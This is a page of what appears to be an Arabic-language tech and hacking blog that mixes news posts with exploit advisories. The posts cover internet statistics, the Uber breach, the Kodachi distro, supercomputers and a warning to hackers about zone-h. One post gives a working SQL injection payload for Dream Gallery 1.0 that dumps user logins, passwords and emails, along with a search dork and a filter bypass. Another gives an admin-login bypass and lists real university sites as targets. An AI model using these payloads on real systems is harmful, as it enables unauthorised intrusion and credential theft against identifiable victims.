loading...

samedi 2 décembre 2017

MES : Dream Gallery 1.0 SQL Injection

# Exploit Title: Dream Gallery 1.0 SQL Injection

# Google Dork: intext: "Rafael Clares" # Date: 2017 / 12 / 01 # Exploit Author: Zerones # Vendor Homepage: N/A # Software Link: N/A # Version: 1.0 and to the top # Tested on: windows 8.1 - FireFox 57.0.1 # CVE : N/A http://target.com/bessa/galeria/album.php?id=[sqli] For Example: http://target.com/bessa/galeria/album.php?id=-14+union+select+1,group_concat(user_login,0x3a,user_password,0x3a,user_email),3,4,5,6,7,8,9+from+users Sometimes you will encounter an error that is a server error and requires a bypass like: http://target.com/bessa/galeria/album.php?id=-14+/*!50000union*/+select+1,unhex(hex(group_concat(user_login,0x3a,user_password,0x3a,user_email))),3,4,5,6,7,8,9+from+users

samedi 25 novembre 2017

ما الذي يحدث في الانترنت في دقيقة واحدة لسنة 2017 ؟

التطور التقني في السنوات الاخيرة شهد قفزة نوعية كبيرة جدا وخاصة بعض ظهور الهواتف الذكية والاجهزة المحمولة ، كل هذه الاجهزة طبعا ساهمت في استهلاكنا للبيانات باشكل يزداد حجما مع الايام  . فالمزيد من التطبيقات والبرامج وكذلك الاجهزة أصبحت تطلب كمية أكبر وكذلك سرعة اتصال اعلى . وطبعا كمية البيانات المستهلكة ستزداد في العالم في السنوات المقبلة بكميات مضاعفة خاصة بعد ان تدخل تقنية 5G حيز التطبيق وكذلك تطور وانتشار للالياف البصرية .


في كل عام يتم نشر رسم بياني به مجموعة من احصائية تقريبية لحجم البيانات الذي يتم استهلاكه خلال دقيقة واحدة فقط على مستوى العالم ، وفي مختلف التطبيقات والمواقع .

وستلاحظ ان ما يحدث على الإنترنت في دقيقة واحدة لسنة 2017 هو كالتالي :
  • فيسبوك: 900 ألف تسجيل دخول
  • يوتيوب: يتم مشاهدة 4.1 مليون فيديو
  • جوجل: 3.5 مليون عملية بحث
  • واتس آب : 16 مليون رسالة 
  • تويتر : 452 الف تغريدة 
  • الشراء من الانترنت :انفاق 751 الف و 522 دولار 

ويمكنك طبعا مقارنة هذه الارقام باحصائيات سنة 2016 لتشاهد مدى التطور الحاصل بين الفترتين كما تبين هذه الصورة  :



vendredi 24 novembre 2017

أحذر أيها الهكرز من موقع zone-h تحذير خطير وهام جدآ لكل الهكرز !!


بسم الله الرحمن الرحيم :

أما بعد:

هذا الموضوع موجه لأخواننا الهكرز العرب الذين يسجلون أختراقاتهم بالموقع العالمي zone-h

رابط الموقع : http://www.zone-h.org



طبعآ الموضوع مرعب لأنه لايوجد هكرز معروف ألا ويسجل أختراقاته في موقع ال zone-h 

طيب هل أحد من الهكرز العرب فكر ماذا يستفيد موقع كبير مثل ال ( zone-h ) 
من حجز سيرفر كبير ومساحة عملاقة لأجل تسجيل أختراقات الهكرز ؟

طبعآ من البديهي أن موقع كبير مثل ال ( zone-h ) وسمعته وضخامته يجب أن 
يكونون المقيمين على الموقع لديهم مبالغ طائلة حتى أستطاعوا أن يضعوا لنا 
هذا الموقع العملاق !

وفي نفس الوقت نعرف أن موقع كهذا يجب أن يكون لديه إعلانات تدعمه وأشخاص 
يدفعون له لحجز سيرفرات و دومين ,, لكن موقع ال ( zone-h ) لايضع إعلانات 
!!

لكن الذي نعرفه ونعمله بشكل دائم أننا نسجل بالموقع بأسم وباسوورد ونسجل 
أختراقاتنا بكل بساطة وذلك للشهرة ولتسجيل بصمتنا للأبد كما هو معرف لدينا 
نحن الهكرز !

لكن هل فكرنا بقراءة ماهو مكتوب بالأنكليزي داخل الموقع منذ بداية التسجيل !؟

أنا متأكد أنه نادر من قرأ ماهو مكتوب ولكن أخذ الموضوع ببساطة دون وقوف لحظة تفكر !

سوف نترجم المهم بالنسبة لنا ::

( إن عملية أختراق الموقع أو تشويه الصفحات أو الحرمان من الخدمة أو الوصول
للأجهزة الخادم أو السيرفرات بشكل غير مصرح به تعتبر جريمة لدى جميع الدول
)

( الزون اتش يقبل تسجيل أخترقاتك ولكنه لايقوم بدعمك أو مؤازرتك في هذا 
العمل ولكنه يرحب بك لكي تقوم بإيقاف هذا العمل غير المشروع أو الممنوع 
أو الغير مرغوب فيه لأنك قد تواجه نفس المصير الذي واجه بعض المخترقين الأخرين سيئ السمعة )

> وطبعا نزل ثلاث روابط فيها أمثلة للأشخاص الذين تم القبض عليهم 
وأعتقالهم والحكم عليهم بالغرامات المالية وبالسجن طبعآ الذي يريد أن يشاهد
يتفضل للموقع ويشاهد بنفسه ,,


بعد هذا يحذر ويقول أنه يظن من وجهة نظره الـ ( zone-h ) أن بعد هذه الأمثلة يجب أن نوقف هذا الخرق الغير مرغوب فيه
حتى لاتعرض نفسك للتطبيق بنفس الأحكام وتقع في نفس المشكلة التي وقع بها المخترقين الآخرين ,,

> وطبعا نزل مثال آخر عن مخترق ( Apocalypse a.k.a. ApocalypseDow ) 
هذا الشخص قدم رسالة إستقالة من الهاك وسمى الهاك بالحرب الغبية طبعآ اللي حابب يشوف الكلام يدخل للموقع ويرى بنفسه :


وفي الأخير يقول ال ( zone-h ) أنك لو لم تقتنع حتى الآن بكل هذي الأمثلة
فنحن نرحب بك أيضا لأقناعك عن طريق الأتصال بأحد أعضاء فريق الزون اتش !!

طبعآ كل هذا الكلام بالنسبة لنا عادي وتقول لي لماذا تقول كل هذا الكلام ؟ 

تعال شوف الشروط التي سوف تطبق على أي شخص يقوم بعملية التسجيل في الزون اتش :

* كل المعلومات والتسجيلات الواردة للزون اتش تعتبر من جرائم الأنترنت الذي يحاسب عليها القانون *

> يعني أنت تعترف أنك بتسجيلك هذي الأخترقات تقوم بجريمة يعاقب عليها القانون !!

نكمل بعد هذا يقول لك:

* أن ال ( zone-h ) غير مسؤول عن تلك الأخترقات أو إستخدام هذه الاتفاقية من أي جهه كانت *
> يعني هذا الأعتراف منك ممكن لو أي جهة أستخدمته ضدك ,, موقع ال ( zone-h ) ليس له أي علاقة
و غير مسؤول عن الإساءات الموجوده داخل الإندكسات والأراء التي تحتويها ,

بعدها يقوم موقع ال ( zone-h ) بتوجيه رسالة لكل أدمن صاحب موقع تم أختراقه من قبل هكرز وتم تسجيله
بموقع ال ( zone-h )

* أن ال ( zone-h ) غير مسؤول عن هذا الأختراق وغير مجبر أو مطالب بمسح أو إزالة صفحة التسجيل
الخاصة بموقعك *

بعدها لاحظ ماذا يقول الموقع ال ( zone-h ) ؟
* أن مهمة ال ( zone-h ) هو تسجيل جميع الأخترقات التي تعتبر جرائم الالكترونية وتخزينها في قاعدة البيانات * 

> طبعآ بتسجيلك في ال ( zone-h ) تعتبر أنك وقعت على ورقة إتهامك 

بعد هذا بقول لك أن جميع منتجات أو أدوات ال ( zone-h ) متاحة لك مجاننآ للأستخدام بشرط أنك تراعي
إتفاقيات المنتج الرئيسي ,, (كلام بخصوص الحماية الفكرية وحقوق المبرمج) ,, يعني يقول أن ال ( zone-h ) 
غير مسؤول عن سوء الأستخدام للخدمة و أن أي إستخدام يكون على مسؤولية المستخدم للمعلومات الموجودة في ال ( zone-h ) !


هذا طبعآ الترجمة للكلام المكتوب بالموقع والذي حاليآ سوف أقوم بتوضيحه لك الآن هو بإستنتاج خاص من الشروط والكلام
المذكور ::

> بما أن الموقع وظيفته تخزين التسجيلات الخاصة بالأخترقات داخل قواعد بيانات وكلنا نعرف ضخامة
ال ( zone-h ) والتسجيلات التي يحتويها وطبعآ هذا يحتاج لأموال خيالية لتوفير سيرفرات تتحمل ضخامة قواعد
البيانات وبما أنهم أيضا يجبرونك على التوقيع على إتفاقية كونك تعمل جريمة إلكترونية بمجرد التسجيل
وبما أنهم يستطيعون الحصول على الأي بي الخاص بك بكل سهولة عند تسجلك بالموقع بأسمك المستعار
إذا توجد جهة مستفيدة من هذه القاعده الضخمة 

وأنا أصبحت متأكد أن ال ( zone-h ) هو موقع للتجسس على الهاكر لإسقاط أي شخص يريدوا أن يأتوا به ,, 
بمعنى لو تم أختراق موقع هام جدآ فكل معلومات الهكرز والأي بي الخاص بهم والمواقع المخترقة موجودة بالموقع 

إذآ الأمر بسيط عندما يريدوا أن يسقطوا رأسك 

لذا أحذر : الهاكرز العرب الذين لديهم صولات وجولات بالمواقع المعادية 
للعروبة والأسلام أن يأخذوا حذرهم من هذا الموقع ويكونوا أكثر ذكاء منه 
ولاتحتاج يا أخي الهكرز أن تسجل أختراقاتك بهذه المواقع فلايوجد شخص يذهب 
لهذا المواقع كي يرى إنجازاتك فقط الهكرز هم من يترددوا على هذه المواقع 
لكننا نحن العرب نعرف تمامآ أخواننا الهكرز وأختراقاتهم بدون تسجيل 
الأختراقات بهذه المواقع فدائمآ نسمع ونرى أختراقاتهم ,, فقط ضع مقطع فيديو 
باليوتيوب أو موضوع بمنتدى كيرا مثلا وصدقني الثرثارين ماراح يخلونك ألا وأنت مشهور 

منقول.


jeudi 23 novembre 2017

أوبر"UBER" تتعرض لعملية قرصنة ضخمة

أوبر تتعرض لعملية قرصنة ضخمة
قبل سنة من الآن تعرضت شركة "أوبر/ Uber" لعملية قرصنة ضخمة استهدفت عشرات الملايين من مستخدميها، لكن الشركة لم تعلن رسميا عن الأمر إلا يوم أمس 22 نوفمبر، وتعتبر هذه العملية هي الأضخم في تاريخها، لكن أوبر احتوت القضية عبر دفع فدية للهاكرز.

الشركة كشفت رسميا عبر مديرها التنفيذي"Dara Khosrowshahi" أنها تعرضت قبل عام للقرصنة من طرف الهاكرز الذين حصلوا على معلومات تخص قرابة 57 مليون مستخدم لتطبيقها، بينهم 7 ملايين سائق منهم 600.000 في الولايات المتحدة الأمريكية وحدها، وأشار المتحدث إلى أن هذه المعلومات تهم بالدرجة الأولى أسماء وعناوين بريد إلكتروني وأرقام الهواتف.

الهاكرز نجحوا في ذلك عبر اختراقهم لأحد سيرفيرات GitHub وذلك في العام الماضي 2016، وأشار المدير التنفيذي لأوبر أن الشركة نجحت بسرعة في تحديد هذا الاختراق والتواصل مع الهاكرز حيث تم عرض اتفاق يحصل بموجبه هؤلاء على فدية تصل إلى 100.000 دولار مقابل عدم نشر البيانات.

فيما أكدت أوبر أن باقي المعلومات الحساسة الأخرى كأرقام الضمان الاجتماعي أو بطائق البنوك لم يتم كشفها وهو ما طمأن المستخدمين.

lundi 20 novembre 2017

MES : Usal - Admin panel Authentication bypass

# Exploit Title: --- Usal - Admin panel Authentication bypass --- #
#
____________________________________________________________________ # # # # # # Google Dork: whatever :) # # # # # Date: 2017-11-20 # # ################################################################### # Description:Any Site that has this perfix is Hacked (Usal) # # # Example : http://site.es/~deportes/admin/index.php # # # # Enter Username and Password : '=' 'OR' # # # # Demo = http://munusal.usal.es/~deportes/admin/index.php # http://masterenhistoria.usal.es/~deportes/admin/index.php # http://buengobierno.usal.es/~deportes/admin/index.php # http://control.usal.es/~deportes/admin/index.php # http://revistas.usal.es/~deportes/admin/index.php # http://ticedu.usal.es/~deportes/admin/index.php # # # # ################################################################### # # Category: Webapps # Version: All Version # Tested on: Windows10 # Language: PHP # 
________________________________________________________ 

vendredi 17 novembre 2017

تعرف على افضل توزيعة للتخفي وتصفح المواقع كالشبح ،والدخول للويب المظلم !

لينكس من الانظمة الاكثر حماية مقارنة بباقي الانظمة الاخرى المنافسة ، وبيئة النظام لا تساعد الفايروس على العمل كمثل باقي الأنظمة .كما انه يتمتع بدرجة عالية من الحرية في تعديل وتشغيل وتوزيع وتطوير أجزاءه. مما يجعله النظام المفضل لدى العديد من المحترفين.

في نظام لينكس ستجد العديد والعديد من التوزيعات المختلفة التي تلبي احتياجات كل شخص ، وهذه نقطة اخرى يتمتع بها هذا النظام ، فمثلا اذا كنت مهتما بالحماية واختبار الاختراق هنا توزيعات خاصة وجاهزة لذلك ، وكذلك في البرمجة ..الخ .

واليوم عزيزي المتابع سنتعرف على توزيعة ربما لم تسمع بها من قبل اسمها "kodachi" وهي توزيعة بايادي عربية ، مبنية على  نظام ديبيان 8.6 وتصنف ضمن التوزيعات الامنية والتخفي على الانترنت .

ما المييز في هذه التوزيعة ؟
هذه التوزيعة مفيدة جدا لك اذا كنت تبحت عن نظام يساعدك على التخفي عند تصفحك للانترنت حيث تكون كالشبح ولا تستطيع المواقع التي تزورها من تتبعك او معرفة اثارك .

عند الدخول الى kodachi والى سطح المكتب فان التوزيعة ستقوم بانشاء اتصال VPN + تور وذلك بواسطة + DNScryptفي تشغيل الخدمة. والجميل ان الامر كله يتم بشكل تلقائي بدون تدخل منك ولا يتطلب الامر منك اعداد اي شيء. وهكذا تستطيع تصفح المواقع بشكل خفي والولوج ايضا الى الويب المظلم .

هذه التوزيعة تم انشائه لتشتغل بدون تتبيث اي ان ما تحتاج هو حرق النظام على مفتاح يو اس بي والاقلاع منه مباشرة ، مما يجعله التوزيعة لا تترك اي اثار علي حاسوبك ، فهي تعمل بالكامل من خلال ذاكرة الوصول  العشوائي والذاكرة المؤقت حيث انه بمجرد إغلاق التوزيعة والخروج منها يتم مسح جميع أثر لنشاطك على الجهاز ،وهذا يساعدك على منع أي تتبع لنشاطاتك.

jeudi 16 novembre 2017

تعرف على أسرع حاسوب في العالم والذي دخل موسوعة جينيس للارقام القياسية

تجدر الاشارة الى ان النزاع الصينى الامريكى حول سوق التكنولوجيا شرس بشكل لا كبير فى العديد من الاسواق والقطاعات ،و الدولة الاسيوية اظهرت قوتها بالفعل في العديد من المجالات التكنولوجية ضد منافس على الجانب الاخر من العالم وهو الولايات المتحدة الامريكية .


والصين استطاعت ان تتفوق على الولايات المتحدة في مجال الحواسيب الخارقة او السوبر كمبيوتر والتي عبارة عن اجهزة كبيرة  تقوم بمعالجة كميات كبيرة من البيانات والمعادلات الرياضية وتحليلها، وتنجز في ثانية واحدة ما تحتاج الحواسيب الأخرى إنجازه في ملايين السنين.

من عام 2017 اصبحت الصين ، تمتلك معظم  معظم الحواسيب الفائقة في قائمة اسرع 500 جهاز حاسوب في العالم. و
تمتلك الصين الآن 202 حاسوب خارق مقابل 143 فقط للولايات المتحدة .بينما تمتلك اليابان 35، والمانيا 20 وفرنسا 18 ، و15 للمملكة المتحدة.

ويتصدر الحاسوب الصيني "sunway taihulight" قائمة اسرع الحواسيب الخارقة في العالم ويوجد في المركز الوطني للحاسبات الفائقة في مدينة ووشى، كما احتل حاسوب اخر من نفس البلد المركز الثاني. بين احتل اسرع حاسوب امريكي المركز الخامس بعد حاسوب اليابان وسويسرا.

 ماذا يعني هذا ؟
هذا التفوق والتحول السريع للصين يبين ان هذه الدولة الاسيوية تواصل  تواصل الاستثمار بكثافة في الحواسيب الفائقة، قادرة على العمل بكفاءة في مجالات علمية متنوعة، من علم الفلك إلى الجيش، إلى التنبؤ بالطقس. والاهم ان هذه الحواسيب هي صنع صيني مما يؤكد ان الصين تحاول ان ان تعتمد على نفسها في صناعة حواسيبها الخارقة والاستقال من التبعية للولايات المتحدة الأمريكية .

جميع الحقوق محفوظة © 2013 Moroccan Electronic School
تصميم : يعقوب رضا